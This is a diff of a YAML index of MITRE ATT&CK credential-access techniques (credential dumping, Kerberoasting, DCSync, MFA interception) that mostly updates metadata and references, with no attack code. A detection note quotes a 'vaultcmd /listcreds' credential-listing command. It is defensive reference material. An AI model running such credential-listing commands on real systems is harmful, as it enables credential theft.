       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -47575,11 +48310,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.006:
     technique:
-      modified: '2023-09-30T20:24:19.357Z'
+      modified: '2024-10-15T14:20:16.722Z'
       name: Cloud Secrets Management Stores
       description: "Adversaries may acquire credentials from cloud-native secret management
         solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -47647,34 +48381,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.008:
     technique:
-      x_mitre_platforms:
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
-      type: attack-pattern
-      created: '2020-02-11T18:46:56.263Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - url: https://attack.mitre.org/techniques/T1003/008
-        external_id: T1003.008
-        source_name: mitre-attack
-      - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
-          File Formats. Retrieved February 19, 2020.
-        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
-        source_name: Linux Password and Shadow File Formats
-      - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
-          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
-          2020.'
-        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
-        source_name: nixCraft - John the Ripper
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-25T20:48:04.491Z'
       name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
       description: |
         Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -47683,20 +48393,42 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
         distributions, can be used to watch for hostile processes attempting to access
         <code>/etc/passwd</code> and <code>/etc/shadow</code>, alerting on the pid,
         process name, and arguments of such programs.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+      created: '2020-02-11T18:46:56.263Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/008
+        external_id: T1003.008
+      - source_name: Linux Password and Shadow File Formats
+        description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+          File Formats. Retrieved February 19, 2020.
+        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+      - source_name: nixCraft - John the Ripper
+        description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+          2020.'
+        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.008
     atomic_tests: []
   T1558.002:
@@ -47728,7 +48460,7 @@ credential-access:
           from Memory. Retrieved October 11, 2019.
         url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
         source_name: Medium Detecting Attempts to Steal Passwords from Memory
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T21:46:46.831Z'
       name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
       description: |-
         Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -47754,13 +48486,11 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.002
     atomic_tests: []
   T1555.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:44:35.906Z'
       name: 'Credentials from Password Stores: Windows Credential Manager'
       description: |-
         Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
@@ -47777,24 +48507,24 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Bernaldo Penas Antelo
+      - Mugdha Peter Bansode
+      - Uriel Kosayev
+      - Vadim Khrykov
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor process and command-line parameters of <code>vaultcmd.exe</code> for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., <code>vaultcmd /listcreds:“Windows Credentials”</code>).(Citation: Malwarebytes The Windows Vault)
 
         Consider monitoring API calls such as <code>CredEnumerateA</code> that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
 
         Consider monitoring file reads to Vault locations, <code>%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\</code>, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Bernaldo Penas Antelo
-      - Mugdha Peter Bansode
-      - Uriel Kosayev
-      - Vadim Khrykov
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -47835,36 +48565,13 @@ credential-access:
         url: https://www.passcape.com/windows_password_recovery_vault_explorer
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.004
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -47885,6 +48592,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -47899,52 +48607,42 @@ credential-access:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -47966,6 +48664,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -47976,23 +48675,50 @@ credential-access:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1111:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:37:20.612Z'
       name: Multi-Factor Authentication Interception
       description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
         (i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -48063,9 +48789,8 @@ credential-access:
         url: https://sec.okta.com/scatterswine
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.003:
     technique:
@@ -48124,12 +48849,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.003
     atomic_tests: []
   T1558.003:
     technique:
-      modified: '2023-03-30T21:01:46.538Z'
+      modified: '2024-09-23T22:20:10.994Z'
       name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
       description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
         (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
@@ -48161,6 +48885,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -48170,7 +48895,6 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -48182,111 +48906,49 @@ credential-access:
       id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
       created: '2020-02-11T18:43:38.588Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1558/003
         external_id: T1558.003
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
       - source_name: Empire InvokeKerberoast Oct 2016
         description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
           March 22, 2018.
         url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
           Domain. Retrieved March 22, 2018.
         url: https://adsecurity.org/?p=2293
-      - source_name: Microsoft Detecting Kerberoasting Feb 2018
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Microsoft SPN
-        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
-          2018.
-        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Microsoft SetSPN
         description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
           Syntax (Setspn.exe). Retrieved March 22, 2018.
         url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
-      - source_name: SANS Attacking Kerberos Nov 2014
-        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        url: https://redsiege.com/kerberoast-slides
+      - source_name: Microsoft SPN
+        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+          2018.
+        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Harmj0y Kerberoast Nov 2016
         description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
-          Retrieved March 23, 2018.
-        url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+          Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.003
     atomic_tests: []
   T1003.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ExtraHop
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
-      type: attack-pattern
-      created: '2020-02-11T18:45:34.293Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.006
-        url: https://attack.mitre.org/techniques/T1003/006
-      - url: https://msdn.microsoft.com/library/cc228086.aspx
-        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
-          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
-        source_name: Microsoft DRSR Dec 2017
-      - url: https://msdn.microsoft.com/library/dd207691.aspx
-        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
-          4, 2017.
-        source_name: Microsoft GetNCCChanges
-      - url: https://wiki.samba.org/index.php/DRSUAPI
-        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
-        source_name: Samba DRSUAPI
-      - url: https://source.winehq.org/WineAPI/samlib.html
-        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
-        source_name: Wine API samlib.dll
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved August 7, 2017.
-        source_name: ADSecurity Mimikatz DCSync
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved August 7, 2017.
-        source_name: Harmj0y Mimikatz and DCSync
-      - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
-        description: Warren, J. (2017, July 11). Manipulating User Passwords with
-          Mimikatz. Retrieved December 4, 2017.
-        source_name: InsiderThreat ChangeNTLM July 2017
-      - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
-        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
-          August 7, 2017.
-        source_name: GitHub Mimikatz lsadump Module
-      - url: https://msdn.microsoft.com/library/cc237008.aspx
-        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
-          Retrieved December 6, 2017.
-        source_name: Microsoft NRPC Dec 2017
-      - url: https://msdn.microsoft.com/library/cc245496.aspx
-        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
-          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
-        source_name: Microsoft SAMR
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved December 4, 2017.
-        source_name: AdSecurity DCSync Sept 2015
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved December 4, 2017.
-        source_name: Harmj0y DCSync Sept 2015
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:54:08.312Z'
       name: 'OS Credential Dumping: DCSync'
       description: |-
         Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
@@ -48297,26 +48959,88 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - ExtraHop
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
 
         Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+      created: '2020-02-11T18:45:34.293Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/006
+        external_id: T1003.006
+      - source_name: GitHub Mimikatz lsadump Module
+        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+          August 7, 2017.
+        url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+      - source_name: ADSecurity Mimikatz DCSync
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved August 7, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: AdSecurity DCSync Sept 2015
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved December 4, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: Microsoft DRSR Dec 2017
+        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc228086.aspx
+      - source_name: Microsoft NRPC Dec 2017
+        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+          Retrieved December 6, 2017.
+        url: https://msdn.microsoft.com/library/cc237008.aspx
+      - source_name: Microsoft GetNCCChanges
+        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+          4, 2017.
+        url: https://msdn.microsoft.com/library/dd207691.aspx
+      - source_name: Microsoft SAMR
+        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc245496.aspx
+      - source_name: Samba DRSUAPI
+        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+        url: https://wiki.samba.org/index.php/DRSUAPI
+      - source_name: Harmj0y DCSync Sept 2015
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved December 4, 2017.
+        url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: Harmj0y Mimikatz and DCSync
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: InsiderThreat ChangeNTLM July 2017
+        description: Warren, J. (2017, July 11). Manipulating User Passwords with
+          Mimikatz. Retrieved December 4, 2017.
+        url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+      - source_name: Wine API samlib.dll
+        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+        url: https://source.winehq.org/WineAPI/samlib.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.006
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -48329,6 +49053,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -48365,17 +49090,17 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
